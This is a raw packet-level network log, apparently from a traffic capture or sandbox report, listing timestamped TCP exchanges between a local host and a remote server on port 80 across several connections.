                                                                                      Nov 13, 2024 09:28:52.153424025 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.153479099 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.153491020 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.153584957 CET5911480192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:52.153624058 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.153636932 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.153698921 CET5911480192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:52.153779984 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.153841972 CET5911480192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:52.153856039 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.153870106 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.153922081 CET5911480192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:52.154037952 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.154048920 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.154059887 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.154095888 CET5911480192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:52.154679060 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.154735088 CET5911480192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:52.154735088 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.154750109 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.154797077 CET5911480192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:52.154897928 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.154908895 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.154920101 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.154951096 CET5911480192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:52.155591011 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.155646086 CET5911480192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:52.155670881 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.155682087 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.155754089 CET5911480192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:52.155858994 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.155872107 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.155881882 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.155910969 CET5911480192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:52.156555891 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.156574011 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.156590939 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.156611919 CET5911480192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:52.156646013 CET5911480192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:52.156789064 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.156800985 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.156811953 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.156843901 CET5911480192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:52.157459974 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.157512903 CET5911480192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:52.157543898 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.157555103 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.157618046 CET5911480192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:52.157718897 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.157731056 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.157742023 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.157773018 CET5911480192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:52.158427954 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.158482075 CET5911480192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:52.158507109 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.158518076 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.158559084 CET5911480192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:52.158655882 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.158667088 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.158679008 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.158710003 CET5911480192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:52.159338951 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.159399033 CET5911480192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:52.159406900 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.159420013 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.159459114 CET5911480192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:52.159574032 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.159585953 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.159595966 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.159627914 CET5911480192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:52.160300016 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.160357952 CET5911480192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:52.160363913 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.160377026 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.160424948 CET5911480192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:52.160510063 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.160521030 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.160563946 CET5911480192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:52.160630941 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.161240101 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.161293030 CET5911480192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:52.161302090 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.161314964 CET805911438.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:52.161360025 CET5911480192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:52.665822983 CET5911480192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:53.677582026 CET5911580192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:53.682632923 CET805911538.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:53.682710886 CET5911580192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:53.691234112 CET5911580192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:53.696072102 CET805911538.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:54.330128908 CET805911538.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:54.330149889 CET805911538.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:54.330200911 CET805911538.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:54.330214024 CET805911538.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:54.330228090 CET5911580192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:54.330229998 CET805911538.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:54.330255032 CET5911580192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:54.330421925 CET805911538.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:54.330435038 CET805911538.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:54.330450058 CET805911538.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:54.330456972 CET5911580192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:54.330463886 CET805911538.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:54.330485106 CET5911580192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:54.330952883 CET805911538.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:54.330988884 CET5911580192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:54.335066080 CET805911538.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:54.335129023 CET805911538.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:54.335144043 CET805911538.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:54.335237980 CET805911538.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:54.335325003 CET5911580192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:54.361907005 CET805911538.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:54.361920118 CET805911538.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:54.361964941 CET5911580192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:54.445463896 CET805911538.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:54.445533037 CET805911538.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:54.445544958 CET805911538.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:54.445583105 CET5911580192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:54.445630074 CET805911538.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:54.445647001 CET805911538.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:54.445676088 CET5911580192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:54.445765018 CET805911538.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:54.445801020 CET5911580192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:54.446032047 CET805911538.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:54.446101904 CET805911538.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:54.446115971 CET805911538.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:54.446136951 CET5911580192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:54.446367979 CET805911538.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:54.446405888 CET5911580192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:54.446433067 CET805911538.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:54.446449041 CET805911538.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:54.446482897 CET5911580192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:54.446769953 CET805911538.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:54.446829081 CET805911538.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:54.446845055 CET805911538.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:54.446866035 CET5911580192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:54.446979046 CET805911538.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:54.447014093 CET5911580192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:54.447287083 CET805911538.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:54.447339058 CET805911538.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:54.447374105 CET5911580192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:54.447411060 CET805911538.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:54.447503090 CET805911538.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:54.447520018 CET805911538.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:54.447544098 CET5911580192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:54.447634935 CET805911538.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:54.447674036 CET5911580192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:54.447751999 CET805911538.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:54.447767019 CET805911538.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:54.447801113 CET5911580192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:54.448307991 CET805911538.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:54.448369026 CET805911538.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:54.448404074 CET5911580192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:54.526283026 CET805911538.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:54.526314020 CET805911538.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:54.526329041 CET805911538.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:54.526374102 CET5911580192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:54.560935020 CET805911538.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:54.560969114 CET805911538.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:54.561002970 CET805911538.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:54.561005116 CET5911580192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:54.561053038 CET5911580192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:54.561059952 CET805911538.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:54.561136961 CET805911538.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:54.561184883 CET5911580192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:54.561216116 CET805911538.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:54.561331034 CET805911538.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:54.561362982 CET805911538.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:54.561378002 CET5911580192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:54.561398029 CET805911538.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:54.561444998 CET5911580192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:54.561534882 CET805911538.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:54.561698914 CET805911538.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:54.561743021 CET5911580192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:54.561764002 CET805911538.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:54.561778069 CET805911538.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:54.561820030 CET5911580192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:54.561985970 CET805911538.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:54.562000990 CET805911538.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:54.562055111 CET5911580192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:54.562092066 CET805911538.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:54.562350988 CET805911538.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:54.562391996 CET805911538.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:54.562392950 CET5911580192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:54.562514067 CET805911538.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:54.562553883 CET5911580192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:54.562585115 CET805911538.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:54.562599897 CET805911538.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:54.562634945 CET5911580192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:54.562793016 CET805911538.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:54.562808037 CET805911538.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:54.562822104 CET805911538.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:54.562839031 CET805911538.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:54.562846899 CET5911580192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:54.562884092 CET5911580192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:54.563064098 CET805911538.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:54.563348055 CET805911538.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:54.563390017 CET5911580192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:54.563426018 CET805911538.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:54.563441038 CET805911538.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:54.563486099 CET5911580192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:54.563636065 CET805911538.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:54.563652039 CET805911538.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:54.563666105 CET805911538.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:54.563683033 CET805911538.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:54.563692093 CET5911580192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:54.563724041 CET5911580192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:54.563926935 CET805911538.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:54.564336061 CET805911538.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:54.564378023 CET5911580192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:54.564397097 CET805911538.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:54.564412117 CET805911538.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:54.564445972 CET5911580192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:54.564591885 CET805911538.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:54.564606905 CET805911538.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:54.564620972 CET805911538.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:54.564637899 CET805911538.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:54.564644098 CET5911580192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:54.564678907 CET5911580192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:54.564917088 CET805911538.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:54.565290928 CET805911538.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:54.565330982 CET5911580192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:54.565352917 CET805911538.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:54.565367937 CET805911538.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:54.565407991 CET5911580192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:54.641747952 CET805911538.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:54.641798019 CET805911538.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:54.641851902 CET805911538.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:54.641885042 CET805911538.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:54.641921043 CET805911538.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:54.641944885 CET5911580192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:54.641944885 CET5911580192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:54.676466942 CET805911538.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:54.676486969 CET805911538.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:54.676503897 CET805911538.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:54.676520109 CET805911538.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:54.676526070 CET5911580192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:54.676536083 CET805911538.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:54.676544905 CET5911580192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:54.676582098 CET805911538.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:54.676584005 CET5911580192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:54.676718950 CET805911538.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:54.676734924 CET805911538.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:54.676755905 CET5911580192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:54.676872969 CET805911538.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:54.676888943 CET805911538.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:54.676904917 CET805911538.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:54.676908970 CET5911580192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:54.676922083 CET805911538.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:54.676939011 CET5911580192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:54.677149057 CET805911538.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:54.677185059 CET5911580192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:54.677494049 CET805911538.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:54.677578926 CET805911538.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:54.677596092 CET805911538.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:54.677614927 CET5911580192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:54.677783966 CET805911538.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:54.677809000 CET805911538.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:54.677819014 CET5911580192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:54.677824974 CET805911538.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:54.677859068 CET5911580192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:54.678050995 CET805911538.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:54.678066969 CET805911538.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:54.678081989 CET805911538.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:54.678097963 CET805911538.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:54.678102016 CET5911580192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:54.678134918 CET5911580192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:54.678303957 CET805911538.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:54.678625107 CET805911538.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:54.678663969 CET5911580192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:54.678693056 CET805911538.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:54.678709984 CET805911538.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:54.678741932 CET5911580192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:54.678883076 CET805911538.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:54.678898096 CET805911538.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:54.678914070 CET805911538.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:54.678930044 CET805911538.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:54.678935051 CET5911580192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:54.678966999 CET5911580192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:54.679243088 CET805911538.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:54.679589987 CET805911538.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:54.679625034 CET5911580192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:54.679650068 CET805911538.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:54.679666042 CET805911538.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:54.679699898 CET5911580192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:54.679850101 CET805911538.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:54.679866076 CET805911538.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:54.679879904 CET805911538.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:54.679897070 CET805911538.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:54.679900885 CET5911580192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:54.679933071 CET5911580192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:54.680160999 CET805911538.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:54.680612087 CET805911538.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:54.680648088 CET5911580192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:54.680692911 CET805911538.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:54.680708885 CET805911538.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:54.680742025 CET5911580192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:54.680836916 CET805911538.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:54.680852890 CET805911538.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:54.680867910 CET805911538.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:54.680883884 CET805911538.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:54.680888891 CET5911580192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:54.680918932 CET5911580192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:54.681137085 CET805911538.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:54.681616068 CET805911538.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:54.681651115 CET5911580192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:54.681684017 CET805911538.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:54.681700945 CET805911538.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:54.681732893 CET5911580192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:54.681878090 CET805911538.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:54.681894064 CET805911538.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:54.681907892 CET805911538.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:54.681922913 CET805911538.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:54.681929111 CET5911580192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:54.681961060 CET5911580192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:54.682176113 CET805911538.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:54.682526112 CET805911538.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:54.682544947 CET805911538.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:54.682564020 CET5911580192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:54.682575941 CET5911580192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:55.209733009 CET5911580192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:56.230909109 CET5911680192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:56.235821009 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:56.236023903 CET5911680192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:56.243518114 CET5911680192.168.2.438.47.237.27
                                                                                      Nov 13, 2024 09:28:56.248471022 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:56.248481035 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:56.248493910 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:56.248500109 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:56.248507977 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:56.248687029 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:56.248701096 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:56.248708010 CET805911638.47.237.27192.168.2.4
                                                                                      Nov 13, 2024 09:28:56.248711109 CET805911638.47.237.27192.168.2.4
